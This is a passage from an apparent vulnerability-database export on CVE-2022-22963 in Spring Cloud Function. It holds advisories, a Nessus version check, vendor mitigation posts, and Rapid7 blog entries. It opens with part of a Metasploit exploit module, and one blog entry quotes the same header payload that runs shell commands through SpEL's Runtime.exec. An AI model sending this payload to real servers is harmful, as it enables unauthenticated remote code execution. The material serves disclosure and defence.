message].to_set.subset?(res.get_json_document&.keys&.to_set)\n\n # best we can do is detect that the service is running\n CheckCode::Detected\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500\n end\nend\n", "sourceHref": "https://0day.today/exploit/37565", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-05-18T05:36:04", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T00:00:59", "type": "osv", "title": "Code Injection in Spring Cloud Function", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-18T04:18:21", "id": "OSV:GHSA-6V73-FGF6-W5J7", "href": "https://osv.dev/vulnerability/GHSA-6v73-fgf6-w5j7", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-04-22T19:43:25", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in access to local resources.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Cloud Function < 3.1.7 / 3.2.X < 3.2.3 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-04T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_113214", "href": "https://www.tenable.com/plugins/was/113214", "sourceData": "No source data", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T17:29:08", "description": "The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in the routing functionality. A remote, unauthenticated attacker could provide a specially crafted SpEL as a routing expression that may result in remote code execution on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-14T00:00:00", "type": "nessus", "title": "VMware Spring Cloud Function < 3.1.7 / 3.2.x < 3.2.3 SPEL Expression Injection (local check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-26T00:00:00", "cpe": ["cpe:/a:vmware:spring_cloud_function"], "id": "SPRING_CVE-2022-22963_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/159730", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159730);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/26\");\n\n script_cve_id(\"CVE-2022-22963\");\n\n script_name(english:\"VMware Spring Cloud Function < 3.1.7 / 3.2.x < 3.2.3 SPEL Expression Injection (local check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in\nthe routing functionality. A remote, unauthenticated attacker could provide a specially crafted SpEL as a\nrouting expression that may result in remote code execution on the remote host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tanzu.vmware.com/security/cve-2022-22963\");\n # https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93cb5cd5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/hktalent/spring-spel-0day-poc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Cloud Function version 3.1.7 or 3.2.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Cloud Function SpEL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:spring_cloud_function\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_spring_cloud_function_installed.nbin\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Spring Cloud Function');\n\nvar constraints = [\n {'fixed_version' : '3.1.7'},\n {'min_version' : '3.2', 'fixed_version' : '3.2.3'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-18T17:29:54", "description": "The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in the routing functionality. A remote, unauthenticated attacker could provide a specially crafted SpEL as a routing expression that may result in remote code execution on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Cloud Function SPEL Expression Injection (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:vmware:spring_cloud_function"], "id": "SPRING_CLOUD_CVE-2022-22963.NBIN", "href": "https://www.tenable.com/plugins/nessus/159375", "sourceData": "Binary data spring_cloud_CVE-2022-22963.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wallarmlab": [{"lastseen": "2022-04-06T16:47:27", "description": "**Quick update**\n\n * There are two vulnerabilities: one 0-day in Spring Core which is named Spring4Shell (very severe, exploited in the wild no CVE yet) and another one in Spring Cloud Function (less severe, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>))\n * Wallarm has rolled out the update to detect and mitigate both vulnerabilities\n * No additional actions are required from the customers when using Wallarm in blocking mode\n * When working in a monitoring mode, consider [creating a virtual patch](<https://docs.wallarm.com/user-guides/rules/regex-rule/#example-block-all-requests-with-the-classmoduleclassloader-body-parameters>)\n\n## **Spring4Shell**\n\nSpring Framework is an extremely popular framework used by Java developers to build modern applications. If you rely on the Java stack it\u2019s highly likely that your engineering teams use Spring. In some cases, it only takes one specially crafted request to exploit the vulnerability.\n\nOn March 29th, 2022, information about the POC 0-day exploit in the popular Java library Spring Core appeared on Twitter. Later it turned out that it\u2019s two RCEs that are discussed and sometimes confused:\n\n * RCE in "Spring Core" (Severe, no patch at the moment) - Spring4Shell\n * RCE in "Spring Cloud Function" (Less severe, [see the CVE](<https://tanzu.vmware.com/security/cve-2022-22963>))\n\nThe vulnerability allows an unauthenticated attacker to execute arbitrary code on the target system. Within some configurations, it only requires a threat actor to send a specific HTTP request to a vulnerable system. Other configurations may require additional effort and research by the attacker\n\nAt the time of writing, Spring4Shell is unpatched in the Spring Framework and there is a public proof-of-concept available. We see exploits in the wild.\n\n**Wallarm update** \n[Wallarm](<https://www.wallarm.com/>) automatically identifies attempts of the Spring4Shell exploitation and logs these attempts in the Wallarm Console.\n\n**Mitigation** \nWhen using Wallarm in blocking mode, these attacks will be automatically blocked. No actions are required.\n\nWhen using a monitoring mode, we suggest creating a virtual patch. Feel free to reach out to [support@wallarm.com](<mailto:support@wallarm.com>) if you need assistance.\n\nThe post [Update on 0-day vulnerabilities in Spring (Spring4Shell and CVE-2022-22963)](<https://lab.wallarm.com/update-on-0-day-vulnerabilities-in-spring-spring4shell-and-cve-2022-22963/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T01:49:02", "type": "wallarmlab", "title": "Update on 0-day vulnerabilities in Spring (Spring4Shell and CVE-2022-22963)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T01:49:02", "id": "WALLARMLAB:9178CD01A603571D2C21329BF42F9BFD", "href": "https://lab.wallarm.com/update-on-0-day-vulnerabilities-in-spring-spring4shell-and-cve-2022-22963/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2022-04-11T09:28:23", "description": "Red Hat OpenShift Serverless Client kn 1.21.1 provides a CLI to interact with Red Hat OpenShift Serverless 1.21.1. The kn CLI is delivered as an RPM package for installation on RHEL platforms, and as binaries for non-Linux platforms.\n\nSecurity Fix(es):\n\n* spring-cloud-function: Remote code execution by malicious Spring Expression (CVE-2022-22963)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T07:34:16", "type": "redhat", "title": "(RHSA-2022:1291) Low: Release of OpenShift Serverless Client kn 1.21.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-11T08:17:49", "id": "RHSA-2022:1291", "href": "https://access.redhat.com/errata/RHSA-2022:1291", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T09:31:12", "description": "This version of the OpenShift Serverless Operator, which is supported on Red Hat OpenShift Container Platform versions 4.6, 4.7, 4.8, 4.9, and 4.10, includes a security fix. For more information, see the documentation listed in the References section.\n\nSecurity Fix(es):\n\n* spring-cloud-function: Remote code execution by malicious Spring Expression (CVE-2022-22963)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T08:22:04", "type": "redhat", "title": "(RHSA-2022:1292) Low: Release of OpenShift Serverless 1.21.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-11T08:22:15", "id": "RHSA-2022:1292", "href": "https://access.redhat.com/errata/RHSA-2022:1292", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2022-04-12T13:59:49", "description": "A flaw was found in Spring Cloud Function via the spring.cloud.function.routing-expression header that is modified by the attacker to contain malicious expression language code. The attacker is able to call functions that should not normally be accessible, including runtime exec calls.\n#### Mitigation\n\nAffected customers should update immediately as soon as patched software is available. There are no other mitigations available at this time. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:29", "type": "redhatcve", "title": "CVE-2022-22963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-12T10:02:27", "id": "RH:CVE-2022-22963", "href": "https://access.redhat.com/security/cve/cve-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-04-06T16:15:25", "description": "## CVE-2022-22963 - Spring Cloud Function SpEL RCE\n\n\n\nA new `exploit/multi/http/spring_cloud_function_spel_injection` module has been developed by our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. This module is unrelated to [Spring4Shell CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), which is a separate vulnerability in the WebDataBinder component of Spring Framework.\n\nThis exploit works by crafting an unauthenticated HTTP request to the target application. When the `spring.cloud.function.routing-expression` HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the [CVE-2022-22963 Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16395/files#diff-85438aef360f2d47359f2cb9d7f9f52465f8bc23f2d9b6fa04fc4fef6eef69dbR109-R111>):\n \n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n \n\nBoth patched and unpatched servers will respond with a 500 server error and a JSON encoded message\n\n## New module content (1)\n\n * [Spring Cloud Function SpEL Injection](<https://github.com/rapid7/metasploit-framework/pull/16395>) by Spencer McIntyre, hktalent, and m09u3r, which exploits [CVE-2022-22963](<https://attackerkb.com/topics/1RIGeNMYFk/cve-2022-22963?referrer=blog>) \\- This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to `3.1.7` and `3.2.3`.\n\n## Bugs fixed (2)\n\n * [#16364](<https://github.com/rapid7/metasploit-framework/pull/16364>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a fix for a crash in `auxiliary/spoof/dns/native_spoofer` and adds documentation for the module.\n * [#16386](<https://github.com/rapid7/metasploit-framework/pull/16386>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash when running the `exploit/multi/misc/java_rmi_server` module against at target server, such as Metasploitable2\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-24T13%3A07%3A34-04%3A00..2022-03-31T11%3A00%3A06-05%3A00%22>)\n * [Full diff 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/compare/6.1.35...6.1.36>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T18:34:29", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T18:34:29", "id": "RAPID7BLOG:F708A09CA1EFFC0565CA94D5DBC414D5", "href": "https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T13:29:14", "description": "\n\nWe have completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. We continue to monitor for new vulnerability instances and to remediate vulnerabilities on internally accessible services. We also continue to monitor our environment for anomalous activity, having found none so far. No action is required by our customers at this time.\n\n## Further reading and recommendations\n\nOur Emergent Threat Response team has put together a [detailed blog post](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) with general guidance about how to mitigate and remediate Spring4Shell. We will continue updating that post as we learn more about Spring4Shell and new remediation and mitigation approaches.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T14:42:42", "type": "rapid7blog", "title": "Update on Spring4Shell\u2019s Impact on Rapid7 Solutions and Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T14:42:42", "id": "RAPID7BLOG:46F0D57262DABE81708D657F2733AA5D", "href": "https://blog.rapid7.com/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-08T21:29:15", "description": "\n\n_Rapid7 has completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. For further information and updates about our internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>)._\n\nIf you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). While discovery and research is evolving, we\u2019re posting the facts we\u2019ve gathered and updating guidance as new information becomes available.\n\n## What Rapid7 Customers Can Expect\n\nThis is an evolving incident. Our team is continuing to investigate and validate additional information about this vulnerability and its impact. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates.\n\n### Vulnerability Risk Management\n\nThe April 1, 2022 content update released at 7:30 PM EDT contains authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release the week of April 11 to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable. We also have an authenticated Windows check available as of the April 7th content release, which requires the April 6th product release (version 6.6.135). More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### Application Security\n\nA block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy. tCell will also detect certain types of exploitation attempts based on publicly available payloads, and will also alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application.\n\nInsightAppSec customers can scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) released April 1, 2022. For guidance on securing applications against Spring4Shell, read our [blog here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>).\n\n### Cloud Security\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nIf the vulnerability is detected in a customer environment, they can leverage filters in InsightCloudSec to focus specifically on the highest risk resources, such as those on a public subnet, to help prioritize remediation. Users can also create a bot to either automatically notify resource owners of the existence of the vulnerability or automatically shut down vulnerable instances in their environment.\n\n### InsightIDR and Managed Detection and Response\n\nWhile InsightIDR does not have a direct detection available for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity.\n\n## Introduction\n\nOur team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.\n\nWhile Rapid7 does not have a direct detection in place for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity. tCell will also detect certain types of exploitation based on publicly available payloads.\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates. Our next update will be at noon EDT on March 31, 2022.\n\nOn March 30, 2022, rumors began to circulate about an unpatched remote code execution vulnerability in Spring Framework when a Chinese-speaking [researcher](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>) published a [GitHub commit](<https://github.com/helloexp/0day/tree/14757a536fcedc8f4436fed6efb4e0846fc11784/22-Spring%20Core>) that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by [Spring.io](<https://spring.io/>) (a subsidiary of VMWare) and is used by many Java-based enterprise software frameworks. The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly [deleted](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>).\n\n\n\nA lot of confusion followed for several reasons: First, the vulnerability (and proof of concept) isn\u2019t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below. Second, a completely different 